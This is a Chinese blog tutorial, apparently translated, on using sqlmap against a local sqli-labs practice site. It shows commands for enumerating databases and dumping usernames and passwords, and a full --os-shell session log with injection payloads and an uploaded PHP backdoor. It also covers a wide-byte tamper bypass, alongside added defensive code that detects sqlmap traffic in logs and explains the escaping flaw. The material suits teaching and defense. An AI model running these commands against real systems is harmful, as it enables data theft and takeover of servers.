  • Basic usage of SQLmap

    Other injection tools
    明小子
    穿山甲
    啊D
     
    Testing once the injection point has been identified
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1
     
    Current database
    sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --current-db
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db
     
    Other databases
    --dbs
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --dbs
     
    Tables in a database
    -D security --tables
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables
     
    Columns in a table
    -D security -T users --columns
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns
     
    Dumping the selected columns
    -D security -T users -C username,password --dump
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump
     
    Injecting a web shell (--os-shell)
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell
     
    Writable web root used for the stager: C:/phpstudy_pro/WWW
     
    sqlmap.py -u http://localhost/sqli/Less-7/?id=1 --os-shell
     
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --os-shell
    (sqlmap ASCII banner, version {1.4.7#stable}, http://sqlmap.org)
     
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
     
    [*] starting @ 22:51:21 /2020-12-28/
     
    [22:51:21] [INFO] resuming back-end DBMS 'mysql'
    [22:51:21] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4954=4954 AND 'HBhg'='HBhg
     
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a717a71,(SELECT (ELT(1554=1554,1))),0x716b6b6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'HyHQ'='HyHQ
     
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5466 FROM (SELECT(SLEEP(5)))fXNK) AND 'oDCa'='oDCa
     
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8233' UNION ALL SELECT NULL,CONCAT(0x716a717a71,0x4666737259654f717656494b4e664d47434c55644a4e764d766d6a6c5a6f74726e71584f6c686358,0x716b6b6a71),NULL-- -
    ---
    [22:51:22] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.5
    [22:51:22] [INFO] going to use a web backdoor for command prompt
    [22:51:22] [INFO] fingerprinting the back-end DBMS operating system
    [22:51:23] [INFO] the back-end DBMS operating system is Windows
    which web application language does the web server support?
    [1] ASP (default)
    [2] ASPX
    [3] JSP
    [4] PHP
    > 4
    do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
    [22:51:28] [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    > 2
    please provide a comma separate list of absolute directory paths: C:\phpstudy_pro\WWW
    [22:51:40] [WARNING] unable to automatically parse any web server path
    [22:51:40] [INFO] trying to upload the file stager on 'C:/phpstudy_pro/WWW/' via LIMIT 'LINES TERMINATED BY' method
    [22:51:41] [INFO] the file stager has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpucxne.php
    [22:51:41] [INFO] the backdoor has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpbuonw.php
    [22:51:41] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell>
    os-shell> ipconfig
    do you want to retrieve the command standard output? [Y/n/a]
    command standard output:
    ---
     
    Windows IP 配置
     
     
    以太网适配器 本地连接:
     
    连接特定的 DNS 后缀 . . . . . . . : localdomain
    本地链接 IPv6 地址. . . . . . . . : fe80::e488:cc63:a814:b8ab
    IPv4 地址 . . . . . . . . . . . . : 192.168.2.12
    子网掩码 . . . . . . . . . . . . : 255.255.255.0
    默认网关. . . . . . . . . . . . . : 192.168.2.2
     
    隧道适配器 isatap.localdomain:
     
    媒体状态 . . . . . . . . . . . . : 媒体已断开
    连接特定的 DNS 后缀 . . . . . . . : localdomain
    ---
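From the defender's side, the session above leaves clear traces in the web server logs: the default sqlmap User-Agent, boolean/time-based/UNION probes, the q...q hex markers wrapped around extracted data, and requests to the tmpXXXXX.php stager and backdoor files. As an added example (not code from the original post), a small Python scanner that flags those traits in access-log lines; the signature names, the log regex and the sample log lines are constructed for this illustration.

```python
# Added example (not from the original post): scan web-server access-log lines
# for the traits visible in the sqlmap session above. Signature names, the
# log regex and the sample log lines are constructed for this illustration.
import re
from urllib.parse import unquote_plus

SIGNATURES = {
    # sqlmap's default User-Agent (unless --user-agent / --random-agent is used)
    "sqlmap_user_agent": re.compile(r"sqlmap/\d", re.I),
    "boolean_tautology": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),  # AND 4954=4954
    "time_based_sleep": re.compile(r"\bSLEEP\(\s*\d+\s*\)", re.I),
    "union_null_probe": re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I),
    # 0x716a717a71 = "qjqzq": sqlmap brackets extracted data with q...q markers
    "sqlmap_hex_marker": re.compile(r"0x71[0-9a-f]{6}71", re.I),
    # --os-shell writes tmpXXXXX.php stager/backdoor files into the web root
    "os_shell_stager": re.compile(r"/tmp[a-z]{5}\.php\b", re.I),
}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

LOG_LINES = [
    '192.168.2.10 - - [28/Dec/2020:22:51:21 +0800] "GET /sqli/Less-1/?id=1%27%20AND%204954%3D4954%20AND%20%27HBhg%27%3D%27HBhg HTTP/1.1" 200 713 "-" "sqlmap/1.4.7#stable (http://sqlmap.org)"',
    '192.168.2.10 - - [28/Dec/2020:22:51:21 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20(SELECT%205466%20FROM%20(SELECT(SLEEP(5)))fXNK)%20AND%20%27oDCa%27%3D%27oDCa HTTP/1.1" 200 713 "-" "Mozilla/5.0"',
    '192.168.2.10 - - [28/Dec/2020:22:51:22 +0800] "GET /sqli/Less-1/?id=-8233%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x716a717a71,0x41,0x716b6b6a71),NULL--%20- HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '192.168.2.10 - - [28/Dec/2020:22:51:41 +0800] "POST /tmpucxne.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '192.168.2.20 - - [28/Dec/2020:22:53:00 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 713 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return the signature names a log line matches (empty list = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    decoded = unquote_plus(m["path"])  # payloads arrive URL-encoded
    hits = []
    for name, rx in SIGNATURES.items():
        haystack = m["ua"] if name == "sqlmap_user_agent" else decoded
        if rx.search(haystack):
            hits.append(name)
    return hits

def suspicious_sources(lines):
    """Map each client IP to the set of signatures it triggered."""
    out = {}
    for line in lines:
        hits = classify(line)
        if hits:
            out.setdefault(LOG_RE.match(line)["ip"], set()).update(hits)
    return out
```

Run over the constructed lines, only 192.168.2.10 is reported, with all six signatures; a hit on the stager signature alone is worth a file-integrity check of the web root, since that file was written by the database server, not by the deployment pipeline.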
     
     
    Wide-byte injection
    Use the unmagicquotes tamper script for the wide-byte bypass:
    sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs
     
    The other bypass (tamper) scripts live in sqlmap's /tamper/ directory,
    e.g. on Kali: /usr/share/sqlmap/tamper/
     
    Look up what each script does yourself (search Baidu); see also
    https://www.cnblogs.com/mark0/p/12349551.html
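Why the wide-byte trick works, and what actually closes it, is easier to see in code. As an added example (not code from the original post or from sqlmap), a Python demonstration of byte-wise backslash escaping failing on a GBK connection, beside a decode-first check that rejects the malformed input; the helper names and the sample input are constructed for this illustration.

```python
# Added example (not from the original post): why byte-wise escaping such as
# addslashes()/magic quotes fails on a GBK connection (the bypass the
# unmagicquotes tamper relies on), and a decode-first check that rejects it.
# Helper names and the sample input are constructed for this illustration.

# Wide-byte payload: 0xBF followed by a quote. After escaping, 0xBF 0x5C (the
# inserted backslash) forms one valid two-byte GBK character, freeing the quote.
WIDE_BYTE_INPUT = b"1\xbf' OR 1=1-- -"

def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping the way PHP's addslashes()/magic quotes do it."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\":
            out += b"\\"
        out.append(b)
    return bytes(out)

def naive_literal(raw: bytes, charset: str) -> str:
    """Escape on bytes, then decode as the DB connection would (the bug)."""
    return addslashes(raw).decode(charset)

def safe_literal(raw: bytes, charset: str) -> str:
    """Decode strictly as the connection charset first, escape characters
    afterwards, so malformed multibyte input raises instead of slipping through.
    (Parameterised queries remain the real fix; this is the minimum check.)"""
    text = raw.decode(charset)  # strict: raises UnicodeDecodeError
    return text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def has_unescaped_quote(text: str) -> bool:
    """True if the literal contains a single quote not preceded by a backslash."""
    escaped = False
    for ch in text:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == "'":
            return True
    return False

def rejects_wide_byte(raw: bytes, charset: str) -> bool:
    """True if the decode-first path refuses the input as malformed."""
    try:
        safe_literal(raw, charset)
    except UnicodeDecodeError:
        return True
    return False
```

With charset "gbk" the naive literal comes back with a live quote after the swallowed backslash, while the same bytes decoded as latin-1 stay escaped; the decode-first path raises on the stray 0xBF instead of building a query around it.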
     
     
    Capturing a POST request and marking the injection point
    1. Capture the POST request with Burp and export it to a file
    2. sqlmap -r [file path/file name]
    3. The remaining options are the same as above

    If anything here is wrong, suggestions and corrections in the comments are welcome.
  • Original article: https://www.cnblogs.com/Tzsblog/p/14234441.html